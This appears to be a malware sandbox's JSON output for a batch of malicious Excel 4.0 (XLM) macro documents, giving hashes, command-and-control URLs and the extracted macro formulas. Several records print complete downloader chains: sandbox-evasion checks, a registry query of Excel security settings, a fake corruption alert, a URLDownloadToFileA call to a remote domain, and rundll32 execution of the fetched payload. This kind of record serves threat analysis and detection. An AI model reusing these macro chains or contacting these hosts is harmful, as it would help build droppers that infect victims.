{"version":"0.2","sample":{"sample":"","kind":"file","target":"aede6e421bb29291278d7b69973911e24ddbb93ee7960a75ae068139823dfeb2"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"aede6e421bb29291278d7b69973911e24ddbb93ee7960a75ae068139823dfeb2","filesize":167424,"md5":"b71d21d65f1240240d5ccd6a2e8c59eb","sha1":"b974a1d6ebb3796c2c5e625aea2b49f066e88c7d","sha256":"aede6e421bb29291278d7b69973911e24ddbb93ee7960a75ae068139823dfeb2","sha512":"783ce16ef7f20bff7a6ed6826f72c327635e02edba59e90d880f48b305d197663e47e112636cf13ea105aeecd29fbe336feca46e27b210867f2c95cfacc82dd7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aede6e421bb29291278d7b69973911e24ddbb93ee7960a75ae068139823dfeb2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"zZJXT1wUpr\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aedf5d7a032eeb30a2b03d06d3da0772ccaaecee29d71c140020f311d1f0e098"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"aedf5d7a032eeb30a2b03d06d3da0772ccaaecee29d71c140020f311d1f0e098","filesize":112640,"md5":"2ad810693eb73cbe2e98e18aebfe69a1","sha1":"27110a4099f9c6cf0581a8cbc4f69a04981d54af","sha256":"aedf5d7a032eeb30a2b03d06d3da0772ccaaecee29d71c140020f311d1f0e098","sha512":"a7b7e1b1688237129680f6d11a7bec4089758d78849685563fde2362b49bdb69833f5485a01f9410042770f0ad438f1a9e5a901d9677037c5aae0f7a1620690b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aedf5d7a032eeb30a2b03d06d3da0772ccaaecee29d71c140020f311d1f0e098.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aee56b385e4e22bdf6feec1cd726fde56e3624f0b4cb78107c9f7904e26c8caf"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"aee56b385e4e22bdf6feec1cd726fde56e3624f0b4cb78107c9f7904e26c8caf","filesize":141824,"md5":"3cf49d62bf5afd828851b1eae5a92a6b","sha1":"3b9a0ea4116708b7c85f469bbddfdbec17ff07c2","sha256":"aee56b385e4e22bdf6feec1cd726fde56e3624f0b4cb78107c9f7904e26c8caf","sha512":"d03f409f72def0107193fb50a351df37e59657d744a50bbaf83d58bd87c236fc2c1ee174508a7d5708a41f87a02a758194cc2ede9be55275da5adaf514005941","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aee56b385e4e22bdf6feec1cd726fde56e3624f0b4cb78107c9f7904e26c8caf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"JMVyEIAGje\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aef82cd9d1b761f3af18273cc63842277381a74496229db79faf674a56b5ab4a"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"aef82cd9d1b761f3af18273cc63842277381a74496229db79faf674a56b5ab4a","filesize":212992,"md5":"51d1e2ca466dd813a09c2ef03f53c571","sha1":"d3d6f4e7ae93a9bf3bb5df60277df417e710fe30","sha256":"aef82cd9d1b761f3af18273cc63842277381a74496229db79faf674a56b5ab4a","sha512":"892e93c3a1814285630e38a438c879fd87d4537cfe087d366dd8241d3c10ee74ca486024d550ae0fd72ff596a3fea172564e4e39d5d2be9a43b950dd5aaf5eb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aef82cd9d1b761f3af18273cc63842277381a74496229db79faf674a56b5ab4a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"gWbJ99yXQn\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aefe4b1a8efa09c59e59916d8e3775782f37f75849582ca6194d4c57e26a1b86"},"analysis":{"reported":"2020-04-09T16:18:18Z","score":10},"files":[{"filename":"aefe4b1a8efa09c59e59916d8e3775782f37f75849582ca6194d4c57e26a1b86","filesize":168960,"md5":"27b3958646ef7e8ca5186474ddc85687","sha1":"5f8c52d45f0f8a271b01002beea39ed00cfec68c","sha256":"aefe4b1a8efa09c59e59916d8e3775782f37f75849582ca6194d4c57e26a1b86","sha512":"ef5c11d7afad0dbd81f4d373d6b8a52b076e4e8b71483df098795c99e6cc08b5582f3bb81f58fac48a8cc05fc847b40275de80e3874bc64c4f27932b70d80669","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aefe4b1a8efa09c59e59916d8e3775782f37f75849582ca6194d4c57e26a1b86.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eoZDN936Sk\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af08301aa6e969c531a2cab50ea2336d127d166828c3b69036d354e531c14acc"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af08301aa6e969c531a2cab50ea2336d127d166828c3b69036d354e531c14acc","filesize":185344,"md5":"2770d01c68c7d107c70afff18d975fb2","sha1":"944d64475fa221a5b7b0ed85659aa06774bf254a","sha256":"af08301aa6e969c531a2cab50ea2336d127d166828c3b69036d354e531c14acc","sha512":"68c64766fa564e79ae15c6d72f70255f124fe3e5bd7465ac628efb9820f83ec1a13f0229b122e57ffd251c0a8714b9eb82c0b07e4fca0f13dc344fa4a94e57c2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af08301aa6e969c531a2cab50ea2336d127d166828c3b69036d354e531c14acc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af0c9761edf006e402d9ea7291b5cae52d7863ba6da9650a37f641bf50c4c101"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af0c9761edf006e402d9ea7291b5cae52d7863ba6da9650a37f641bf50c4c101","filesize":168960,"md5":"497528e9b188508d16234e19ea942ba2","sha1":"4de8235074b5bc7c993707b93c905d85d259e5ee","sha256":"af0c9761edf006e402d9ea7291b5cae52d7863ba6da9650a37f641bf50c4c101","sha512":"e4a93d882b878b73912f5577d03d9ed3210f9d1ad8cfe43fc4a85fbb6444d558be78e60cba580424fcc5a0aa639551c9901c697453f90611a762e8a26c3330bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af0c9761edf006e402d9ea7291b5cae52d7863ba6da9650a37f641bf50c4c101.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uG5nZX96dC\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af144136709827c6c15ee0247220a8ca912497172e650160b318123122280f12"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af144136709827c6c15ee0247220a8ca912497172e650160b318123122280f12","filesize":206336,"md5":"3c1f9af3bbf8641209f16be94fbb338f","sha1":"53258f2426e2373d5256bba700958b766e931e34","sha256":"af144136709827c6c15ee0247220a8ca912497172e650160b318123122280f12","sha512":"e31202891207af27452ebcab260a955bf4a6f57d59a2c2793dabafcea08c467e0ec3dc08c9469e0f991f342fc62b56e059fee9329577f5672aaa3562705f851f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af144136709827c6c15ee0247220a8ca912497172e650160b318123122280f12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6p7e48IiWz\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af1fb905585e9b4e79d462afffdc4076af8950aa2669f8f0ae41f6b59cd7fea7"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af1fb905585e9b4e79d462afffdc4076af8950aa2669f8f0ae41f6b59cd7fea7","filesize":116224,"md5":"32f4c42c3160cdec9b266fcf2476f5d8","sha1":"e445c4110a7ee4d49e1d202562a173253b1ec557","sha256":"af1fb905585e9b4e79d462afffdc4076af8950aa2669f8f0ae41f6b59cd7fea7","sha512":"f7a1726af5ca13ffdb735a5d1b84de57b7168d4b4bbac91f4f492b689bfd1ac836c18a81b9237c6e791c6c597b12a05c739ba7404ca6e540ccb0837c31248bf8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af1fb905585e9b4e79d462afffdc4076af8950aa2669f8f0ae41f6b59cd7fea7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"G5wQzipfCL\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af2721e8856e7a456421db2bae41bd7b31face62618f5c5997929271e40125d1"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af2721e8856e7a456421db2bae41bd7b31face62618f5c5997929271e40125d1","filesize":209920,"md5":"4b5d013c0ee310dbe086c102ea5f0d68","sha1":"559219014f566a4166d189adc6179a610d385857","sha256":"af2721e8856e7a456421db2bae41bd7b31face62618f5c5997929271e40125d1","sha512":"85c92053d68d156f1579558e3fe5fba19f4222593d922722c31804717ca8de39baa976d939acc482d51f4d5377a8952c0eb6df433d404878c3deeb2cea552ddc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af2721e8856e7a456421db2bae41bd7b31face62618f5c5997929271e40125d1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Y0AMyNFaHA\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af31925173229860de7eee6d763127a3d2e79e1f53b55dbb234010edf2b710e6"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af31925173229860de7eee6d763127a3d2e79e1f53b55dbb234010edf2b710e6","filesize":185344,"md5":"34045aec0445f526c5e789a3c0feb3a5","sha1":"15bcd4da62d48d5cb220a7603b853005d4abac00","sha256":"af31925173229860de7eee6d763127a3d2e79e1f53b55dbb234010edf2b710e6","sha512":"ad633f8382edef7e55e6dd66c0aef8879db5d269c6b5e98ceb7706a964b57763a4d7e4944289326a6837d52a8a3607cd414660495e07ddd735e6e0472ec90afb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af31925173229860de7eee6d763127a3d2e79e1f53b55dbb234010edf2b710e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af34441ba7b239097f4ee3559800623f96f773cd679a7e32f18b2bcc793e5442"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af34441ba7b239097f4ee3559800623f96f773cd679a7e32f18b2bcc793e5442","filesize":185344,"md5":"61fbe0f8a8a56d743c88e643863870a4","sha1":"e5d5fed2415f4a9bb7cfc605659bac34fa5d0761","sha256":"af34441ba7b239097f4ee3559800623f96f773cd679a7e32f18b2bcc793e5442","sha512":"6d080954706d17278ecce597078ce01a14951baef5c3fd04cce0bc9e58241e1224d972caad61c8ce947017911a7e6e35d6a860b8524e203b0eae697b5b37b1a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af34441ba7b239097f4ee3559800623f96f773cd679a7e32f18b2bcc793e5442.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af36939be1b52ab38504b50793637f3bb9c97d94dbfeff13613090a204273f8f"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af36939be1b52ab38504b50793637f3bb9c97d94dbfeff13613090a204273f8f","filesize":168960,"md5":"9d0f453d26e9ce28604ef8f606adc148","sha1":"d18d401c5cc407535893d10db6566fdc4aa0bef4","sha256":"af36939be1b52ab38504b50793637f3bb9c97d94dbfeff13613090a204273f8f","sha512":"7229b1efc8387587f7f76f4f46f978bff3adabab82626d263891a9102617437d9049842f372d908d2c93156becde6d0b79bae0104e2d3b95a6db4965cc14e1f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af36939be1b52ab38504b50793637f3bb9c97d94dbfeff13613090a204273f8f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fmlkPe0u3x\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af3ddbfe81b08a1f99d1ffe4d579469eb41d5d58f1badd0c3254ac3b88db8d71"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af3ddbfe81b08a1f99d1ffe4d579469eb41d5d58f1badd0c3254ac3b88db8d71","filesize":145920,"md5":"b7e91b639c7688b828b0e235b57438e3","sha1":"7b18654915b60ff3f53fb46d85d18b9dc4b7c11a","sha256":"af3ddbfe81b08a1f99d1ffe4d579469eb41d5d58f1badd0c3254ac3b88db8d71","sha512":"e59e1f1a70cb49ed35705f5feaa95370693afb7be972dd1158a59daa73d173f8c838444f996fbbfe73994d3493239c29c883bc074b4eebe1590375a9f992e016","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af3ddbfe81b08a1f99d1ffe4d579469eb41d5d58f1badd0c3254ac3b88db8d71.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"RYqjBdaJl8\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af4a13ad7b34d9a764d807ca11ddfb03035f307b3b16c2407506077a73b6e742"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af4a13ad7b34d9a764d807ca11ddfb03035f307b3b16c2407506077a73b6e742","filesize":167936,"md5":"19ac970b0d9b25b72b1ec61aad83ab74","sha1":"5beb40868f65316f793442400f94663c89bfcc4b","sha256":"af4a13ad7b34d9a764d807ca11ddfb03035f307b3b16c2407506077a73b6e742","sha512":"52bdba5c379c457a16b582463a6352e7da236c336263a0cf6b1b3026aca796fbb7119fa8875afda791cdec40f0e00ff75008c78f1850a38ce820b936761d248d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af4a13ad7b34d9a764d807ca11ddfb03035f307b3b16c2407506077a73b6e742.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZRVhZWQHpH\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af4d0e4877b31c5de99b3986b5ca29c4ff15f2e8a49f4bd64e2e67f6c0f698ee"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af4d0e4877b31c5de99b3986b5ca29c4ff15f2e8a49f4bd64e2e67f6c0f698ee","filesize":145408,"md5":"b7c72c02d3ca47bd106dcecb3d701015","sha1":"7e67f950455a4d9ac4e1ec2b1426c527d630f022","sha256":"af4d0e4877b31c5de99b3986b5ca29c4ff15f2e8a49f4bd64e2e67f6c0f698ee","sha512":"905391074961e9075866103d56a2ee29a14d5e5ce2d024043771606c19c4536419fa167c18d9ebf276568128fa6308b7f6281c0d2eafd986512eb3b4cba98ff4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af4d0e4877b31c5de99b3986b5ca29c4ff15f2e8a49f4bd64e2e67f6c0f698ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://studyshine.in/wp-cryn.php","https://arturkauf.pl/wp-cryn.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://studyshine.in/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://arturkauf.pl/wp-cryn.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xRdo9KhkbZ\",TRUE)\nGOTO(R$0C$11)"}}}]}
